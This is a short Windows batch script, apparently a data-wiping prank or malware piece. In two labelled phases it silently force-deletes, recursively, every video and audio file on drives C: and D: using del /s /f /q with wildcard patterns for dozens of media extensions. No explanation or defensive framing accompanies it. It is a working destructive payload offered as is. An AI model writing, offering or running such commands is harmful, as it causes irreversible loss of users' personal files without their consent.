echo "Phase 1 (Video Files)"
del /s /f /q "C:\*.mp4"
del /s /f /q "C:\*.avi"
del /s /f /q "C:\*.flv"
del /s /f /q "C:\*.wmv"
del /s /f /q "C:\*.mov"
del /s /f /q "C:\*.webm"
del /s /f /q "C:\*.mkv"
del /s /f /q "C:\*.f4v"
del /s /f /q "C:\*.vob"
del /s /f /q "C:\*.ogg"
del /s /f /q "C:\*.gifv"
del /s /f /q "C:\*.amv"
del /s /f /q "C:\*.mpg"
del /s /f /q "C:\*.mp2"
del /s /f /q "C:\*.mpeg"
del /s /f /q "C:\*.mpe"
del /s /f /q "C:\*.mpv"
del /s /f /q "C:\*.m4v"
del /s /f /q "C:\*.3gp"

del /s /f /q "D:\*.mp4"
del /s /f /q "D:\*.avi"
del /s /f /q "D:\*.flv"
del /s /f /q "D:\*.wmv"
del /s /f /q "D:\*.mov"
del /s /f /q "D:\*.webm"
del /s /f /q "D:\*.mkv"
del /s /f /q "D:\*.f4v"
del /s /f /q "D:\*.vob"
del /s /f /q "D:\*.ogg"
del /s /f /q "D:\*.gifv"
del /s /f /q "D:\*.amv"
del /s /f /q "D:\*.mpg"
del /s /f /q "D:\*.mp2"
del /s /f /q "D:\*.mpeg"
del /s /f /q "D:\*.mpe"
del /s /f /q "D:\*.mpv"
del /s /f /q "D:\*.m4v"
del /s /f /q "D:\*.3gp"


echo "Phase 2 (Audio Files)"
del /s /f /q "C:\*.wav"
del /s /f /q "C:\*.aiff"
del /s /f /q "C:\*.mp3"
del /s /f /q "C:\*.acc"
del /s /f /q "C:\*.wma"
del /s /f /q "C:\*.ogg"
del /s /f /q "C:\*.wma"
del /s /f /q "C:\*.flac"

del /s /f /q "D:\*.wav"
del /s /f /q "D:\*.aiff"
del /s /f /q "D:\*.mp3"
del /s /f /q "D:\*.acc"
del /s /f /q "D:\*.wma"
del /s /f /q "D:\*.ogg"
del /s /f /q "D:\*.wma"
del /s /f /q "D:\*.flac"

echo Done!!!